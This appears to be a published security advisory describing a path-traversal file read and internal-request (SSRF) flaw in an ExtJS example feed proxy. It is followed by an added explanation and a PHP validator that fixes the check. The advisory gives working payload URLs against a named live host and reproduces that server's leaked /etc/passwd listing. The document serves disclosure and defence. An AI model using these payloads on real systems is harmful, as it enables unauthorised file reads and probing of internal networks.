KhiZaRix

extjs Arbitrary File Read



Hi all,

Baidu Security Team found a vulnerability in extjs. With this vulnerability we can read arbitrary files and request internal HTTP services.

File: /examples/feed-viewer/feed-proxy.php, lines 3-6

$feed = $_REQUEST['feed'];

if($feed != '' && strpos($feed, 'http') === 0){
    header('Content-Type: text/xml');
    $xml = file_get_contents($feed);   // $feed is only checked to *start with* "http"; file_get_contents accepts a URL or a local path
    // ... remainder of the script (not quoted in the advisory) returns $xml to the client
}

When we request a URL like this:
http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1

if the resource exists, we can get internal HTTP service info.

Because of "strpos($feed, 'http') === 0", we can request this URL to bypass the restriction and achieve arbitrary file read:

http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd


View the HTML source code:


root:x:0:0:Web-useast4 root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
ntp:x:105:111::/home/ntp:/bin/false
snmp:x:106:112::/var/lib/snmp:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
postfix:x:108:114::/var/spool/postfix:/bin/false


Submitter: zhanghao@Baidu X-team gaojianfeng@Baidu X-team shitong@Baidu X-team

________________________________
Id:Yaseng
Hi: Hisengberg
Team: Baidu X-team
E-mail:gaojianfeng@baidu.com<mailto:gedongyu@baidu.com>
[tips]

Source: http://dl.packetstormsecurity.net/1505-exploits/extjs-disclose.txt
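The root cause in the advisory above is that `strpos($feed, 'http') === 0` only tests a string prefix, so a path such as `http/../../etc/passwd` passes and `file_get_contents` happily opens a local file, while any URL that does start with `http://` can point at internal hosts. The following is an added example (not code from the advisory or from the ExtJS project) that places the original check beside a stricter validator a proxy endpoint like this one would need: parse the value as a URL, require an http(s) scheme and a host, optionally restrict to an allowlist, and refuse hosts that are, or resolve to, loopback/private/reserved addresses. The `$allowedHosts` parameter and the `fetch_feed` wrapper are hypothetical additions; the host resolution uses `gethostbynamel`, so the example needs DNS for hostname inputs (IP-literal inputs are judged offline).

```php
<?php
// Added example, not part of the advisory or the ExtJS feed-viewer code.

// The advisory's check: true for "http://10.1.1.1" and also for
// "http/../../../../etc/passwd", because only the prefix is tested.
function vulnerable_check(string $feed): bool
{
    return $feed != '' && strpos($feed, 'http') === 0;
}

// Stricter validation for a feed-proxy endpoint.
// $allowedHosts is a hypothetical allowlist (empty = any public host).
function validate_feed_url(string $feed, array $allowedHosts = []): bool
{
    $parts = parse_url($feed);
    // "http/../../etc/passwd" parses as a bare path: no scheme, no host -> rejected.
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false; // no file://, php://, ftp:// or other wrappers
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false; // no credentials embedded in the feed URL
    }
    $host = strtolower($parts['host']);
    if ($allowedHosts !== [] && !in_array($host, $allowedHosts, true)) {
        return false;
    }
    // Reject literal or resolved addresses in loopback/private/reserved ranges:
    // this is what stops the internal-service probing the advisory describes.
    $addresses = filter_var($host, FILTER_VALIDATE_IP) !== false
        ? [$host]
        : (gethostbynamel($host) ?: []);
    if ($addresses === []) {
        return false; // unresolvable host
    }
    foreach ($addresses as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}

// Fetch only after validation; do not follow redirects (a redirect could
// point back at an internal address) and bound the request time.
function fetch_feed(string $feed): ?string
{
    if (!validate_feed_url($feed)) {
        return null;
    }
    $ctx = stream_context_create([
        'http' => ['follow_location' => 0, 'timeout' => 5, 'ignore_errors' => true],
    ]);
    $xml = @file_get_contents($feed, false, $ctx);
    return $xml === false ? null : $xml;
}

// Constructed inputs mirroring the advisory's two payloads plus two controls.
$payloads = [
    'http/../../../../../../../../../../../etc/passwd',
    'http://10.1.1.1',
    'http://127.0.0.1/',
    'http://example.com/feed.xml',
];
foreach ($payloads as $p) {
    printf("%-50s vulnerable=%s strict=%s\n", $p,
        vulnerable_check($p) ? 'pass' : 'reject',
        validate_feed_url($p) ? 'pass' : 'reject');
}
```

Both advisory payloads pass `vulnerable_check` and fail `validate_feed_url`: the traversal string has no scheme or host once parsed, and `10.1.1.1` falls in a private range. Two caveats for a real deployment: `gethostbynamel` returns only IPv4 records, so IPv6-only hosts need a `dns_get_record` lookup with the same range check, and resolving at validation time and again at fetch time leaves a DNS-rebinding window, which is why an explicit allowlist (or fetching the validated IP directly with a `Host` header) is the more robust choice.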
